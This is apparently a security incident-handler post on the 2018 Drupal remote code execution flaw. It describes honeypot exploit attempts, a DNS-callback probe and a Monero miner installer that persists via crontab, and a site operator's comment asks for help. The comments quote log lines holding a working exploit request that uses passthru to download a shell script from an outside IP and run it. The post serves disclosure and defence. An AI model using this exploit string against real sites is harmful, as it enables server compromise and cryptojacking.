[Update: Now used to install Monero Miners. See below for details]
Drupal announced a Remote Code Execution vulnerability affecting Drupal 7.x and 8.x on March 28 (https://www.drupal.org/sa-core-2018-002)
Proof of concpet code appeared on github on April 12th. Quick testing on handler's honeypots indicate that it functions as advertised.
Upgrade to 7.58 or 8.5.1
Scans/attemps are showing up in other Handlers' honeypots:
And here is a second exploit attempt, trying to identify vulnerable servers:
The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as mu6fea.ceye.io is a wildcard DNS entry, and *.mu6fea.ceye.io appears to resolve to 220.127.116.11 right now. So the detection of who is "pinging" is made most likely via DNS.
The authoritative name server for "ceye.io" is ns.hackernews.cc, which appears to belong to a Chinese security news site. Maybe they are working on a story to publish how many vulnerable systems there are, but actual exploitation of a vulnerability, even if somewhat benign, may be a step too far for a news story.
Other payloads spotted so far:
Here is one installing the standard xmrig Monero miner. The exploit string (spaces added to allow for wrapping on small screens):
This decodes to: (http replaced with hxxp)
"i" is an installer script. It collects information about the system and makes itself persistent via an entry in the crontab:
It also download additional files:
the miner will then connect to port 6666 on u5evn7.if1j0ytgkypa.tk , which currently resolves to 18.104.22.168 and 22.214.171.124.
Apr 13th 2018
Apr 13th 2018
2 years ago
Our site has updated to drupal 7.59 and the problem still exists.
Centos 7.3 / sw-nginx-1.11.1-centos7.17071211.x86_64
Can you tell me which /tmp file it is using for the download ?
They are using Python to submit the POST. I have tried to simulate the post by doesnt' work, any suggestions ?
Any assistance would be appreciated.
Below is just one example, have quite a few if needed. The logs indicate only a POST is being issued.
OUR.com/logs/access_log:126.96.36.199 - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[%23post_render]=passthru&name[%23markup]=wget%20-O%20/tmp/a.sh%20http://188.8.131.52/a.sh;%20sh%20/tmp/a.sh&name[%23type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7"
OUR.com/logs/access_log:184.108.40.206 - - [20/Jun/2018:04:48:56 -0400] "POST /?q=user/password&name[#post_render]=passthru&name[#markup]=wget -O /tmp/a.sh http://220.127.116.11/a.sh; sh /tmp/a.sh&name[#type]=markup HTTP/1.0" 200 26615 "-" "Python-urllib/2.7"
Jun 20th 2018
2 years ago